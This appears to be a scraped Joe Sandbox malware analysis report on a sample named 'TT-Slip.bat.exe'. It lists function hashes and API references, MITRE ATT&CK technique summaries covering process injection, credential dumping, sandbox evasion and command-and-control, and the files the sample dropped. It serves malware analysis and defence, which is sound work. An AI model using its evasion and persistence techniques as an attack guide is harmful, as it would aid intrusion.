Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1a5e9bf9d0467727578f1bcf644159bbd776e8752ed3fd7b3745ff44764e6659
Instruction ID: b3a22b010dbb1fc56615850aad6d83e7ef5bb92af678cb557e6af00b60f4b347
Opcode Fuzzy Hash: 1a5e9bf9d0467727578f1bcf644159bbd776e8752ed3fd7b3745ff44764e6659
Instruction Fuzzy Hash: 5E325870D0466ADFEB65DF68C884BEDBBF0BB08304F0081E9D58AA7241D7759A84CF95

Function 010B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 010B7E8B

Strings

-, xrefs: 010B7DDD
+, xrefs: 010B7DE8

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: 358f3f4993f409c4c13f4706f999facc749a150f522bd600101ffcf4a7c6016f
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: B2919071E0020A9AEB64DF6DC8C16FEBBF5EF84760F14455AE9A5EB2D0D73089408715

Function 0108D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0108D3A4

Strings

Bl, xrefs: 0108D48C
l, xrefs: 0108D46B

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: 9da631d33195c321a02ce53c17652c11c7fbc50de28ff2f7834859c04093ab6a
Instruction ID: fd8828629d04690156b160d1dc870adf38cd74163f1971c7524b56af5a7801b4
Opcode Fuzzy Hash: 9da631d33195c321a02ce53c17652c11c7fbc50de28ff2f7834859c04093ab6a
Instruction Fuzzy Hash: 22A1D530A083299BEF75EB98C890BEDB7B1BB44304F0442E9D5C967291CB75AD85CF51

Function 010B5DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 010B5E34

Strings

pow, xrefs: 010B5E0C, 010B5E29

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 249733da603aac5ba6f7aba2e0d9176d10528d75d68ee8cd261712e2ef9a0c06
Instruction ID: 24644fa3a37df2243f10f9ffc916cd1781d618cb8f7ff8d56a23f0b0a3fa9777
Opcode Fuzzy Hash: 249733da603aac5ba6f7aba2e0d9176d10528d75d68ee8cd261712e2ef9a0c06
Instruction Fuzzy Hash: 5F516771A1860697DB6AB61CCDC53FE7BD4EB00700F10CDE8F4F686299EB3588958B46

Function 010A4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 010A4CC3
Flst, xrefs: 010A4C96

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 49efac637f2ef43bdae6d64a5c2608aeeffa7e3fed2f0bfb42a81fc31888b6e0
Instruction ID: 19783e536fcb60d93ec251daaa1f8065610d3574da6c51c14774035aa63bf270
Opcode Fuzzy Hash: 49efac637f2ef43bdae6d64a5c2608aeeffa7e3fed2f0bfb42a81fc31888b6e0
Instruction Fuzzy Hash: 11518CB5A002188FCF66DF99C4846ADFBF4FF44714F5880AAD09ADB251E7B09985CB80

Function 0109D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0109D959

Part of subcall function 01074859: RtlDebugPrintTimes.NTDLL ref: 010748F7

Strings

$, xrefs: 0109D900
$, xrefs: 0109D86D

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 00e07c694736c158a36f93659c4135a273e2cb243c74fc56abbb9a3d2fce6c15
Instruction ID: d809461a3089590e3625b687f30c5b84f7e7ebf30b4f181bbe3e4f51fdf5e829
Opcode Fuzzy Hash: 00e07c694736c158a36f93659c4135a273e2cb243c74fc56abbb9a3d2fce6c15
Instruction Fuzzy Hash: AE513371A44346DFDF68EFA8C4947EEBBF2BF04304F148069C8956B292D771A881DB90

Function 010EFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010EFE73
RtlDebugPrintTimes.NTDLL ref: 010EFE95

Strings

$, xrefs: 010EFE3D

Memory Dump Source

Source File: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: f52f57ba42be44bbaeb2a4ec4f12568926da4fc154f7434ace46a47266beccf4
Instruction ID: 793937131e7159aea48369d38bbdff445f30f3bfe91e013d6eedc79986b74488
Opcode Fuzzy Hash: f52f57ba42be44bbaeb2a4ec4f12568926da4fc154f7434ace46a47266beccf4
Instruction Fuzzy Hash: 9941AE75A0120AAFCB55DF9AC884AEEBBF5FF48714F140069ED94A7302D771AD50CB90

Function 0106DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0106E040

Strings

0, xrefs: 0106E020
0, xrefs: 0106E00B

Memory Dump Source

Source File: 0000000E.00000002.2417256355.0000000001066000.00000040.00001000.00020000.00000000.sdmp, Offset: 01040000, based on PE: true

Associated: 0000000E.00000002.2417256355.0000000001040000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001047000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.00000000010C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001102000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001163000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2417256355.0000000001169000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1040000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 2810c0b39b33122fe993e9cbb1fc02e303263d8e1bbec1893a1b2455998486b0
Instruction ID: 81633269827365e41ab0ba2513133c7f44cd15a1323b635ee976a9ff515239a1
Opcode Fuzzy Hash: 2810c0b39b33122fe993e9cbb1fc02e303263d8e1bbec1893a1b2455998486b0
Instruction Fuzzy Hash: 20418BB1608706AFD350CF28C484A5ABBE8BF88314F04496EF5C8DB351D731EA45CB96

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TT-Slip.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IiIseKTckjhZgQ.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT-Slip.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\66159w4

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyhttayg.0t0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftmyq5rb.krh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iizsztyd.cds.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qh1yuib0.bxk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxarehal.vhh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtoao1ar.5gy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt4c3ofi.5kh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3pjkutn.434.psm1

C:\Users\user\AppData\Local\Temp\tmp9EE7.tmp

Windows Analysis Report
TT-Slip.bat.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre